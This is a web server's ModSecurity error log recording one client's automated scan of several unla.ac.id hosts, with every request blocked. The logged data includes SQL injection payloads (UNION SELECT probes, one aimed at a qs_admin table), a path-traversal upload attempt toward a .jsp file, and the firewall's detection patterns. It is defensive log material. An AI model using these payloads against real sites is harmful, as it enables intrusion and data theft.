[Tue Aug 29 11:32:15.327773 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQMr04AAAAu"]
[Tue Aug 29 11:32:15.329148 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H00AAAAK"]
[Tue Aug 29 11:32:15.352319 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAN9sUAAAAAJ"]
[Tue Aug 29 11:32:15.355254 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQOv7kAAAAw"]
[Tue Aug 29 11:32:15.358851 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAANWgY0AAAAG"]
[Tue Aug 29 11:32:15.367639 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H08AAAAK"]
[Tue Aug 29 11:32:15.413715 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQMr1IAAAAu"]
[Tue Aug 29 11:32:15.413758 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQMr1IAAAAu"]
[Tue Aug 29 11:32:15.416547 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAP5mQgAAAAM"]
[Tue Aug 29 11:32:15.416585 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAP5mQgAAAAM"]
[Tue Aug 29 11:32:15.423697 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAANWgZAAAAAG"]
[Tue Aug 29 11:32:16.307635 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQ9H1MAAAAK"]
[Tue Aug 29 11:32:16.334200 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1QAAAAu"]
[Tue Aug 29 11:32:16.334248 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1QAAAAu"]
[Tue Aug 29 11:32:16.336968 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO100MCo-f0AAAPDoDQAAAAP"]
[Tue Aug 29 11:32:16.338719 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQ83RsAAAAI"]
[Tue Aug 29 11:32:16.341639 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQOv78AAAAw"]
[Tue Aug 29 11:32:16.358764 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83RwAAAAI"]
[Tue Aug 29 11:32:16.358817 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQ83RwAAAAI"]
[Tue Aug 29 11:32:16.367584 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQnF9YAAAAF"]
[Tue Aug 29 11:32:16.367631 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQnF9YAAAAF"]
[Tue Aug 29 11:32:16.379813 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQOv8EAAAAw"]
[Tue Aug 29 11:32:16.442313 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQnF9kAAAAF"]
[Tue Aug 29 11:32:16.463568 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO100MCo-f0AAAQnF9oAAAAF"]
[Tue Aug 29 11:32:17.378998 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqcAAAAB"]
[Tue Aug 29 11:32:17.399201 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAP5mQ0AAAAM"]
[Tue Aug 29 11:32:17.420013 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqkAAAAB"]
[Tue Aug 29 11:32:17.425092 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100cCo-f0AAAQOv8QAAAAw"]
[Tue Aug 29 11:32:17.425138 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100cCo-f0AAAQOv8QAAAAw"]
[Tue Aug 29 11:32:17.449686 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAANWgZcAAAAG"]
[Tue Aug 29 11:32:17.454679 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100cCo-f0AAAQOv8UAAAAw"]
[Tue Aug 29 11:32:17.458318 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqoAAAAB"]
[Tue Aug 29 11:32:18.312955 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100sCo-f0AAAQnF90AAAAF"]
[Tue Aug 29 11:32:18.333310 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUIDsAAAA2"]
[Tue Aug 29 11:32:18.349274 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83SYAAAAI"]
[Tue Aug 29 11:32:18.355143 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUIDwAAAA2"]
[Tue Aug 29 11:32:18.355276 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQMr2EAAAAu"]
[Tue Aug 29 11:32:18.369541 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83ScAAAAI"]
[Tue Aug 29 11:32:18.373679 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQnF@AAAAAF"]
[Tue Aug 29 11:32:18.379766 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQKOfwAAAAs"]
[Tue Aug 29 11:32:18.383797 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAANwNxsAAAAb"]
[Tue Aug 29 11:32:18.389006 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAARA7YUAAAAA"]
[Tue Aug 29 11:32:18.396650 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83SgAAAAI"]
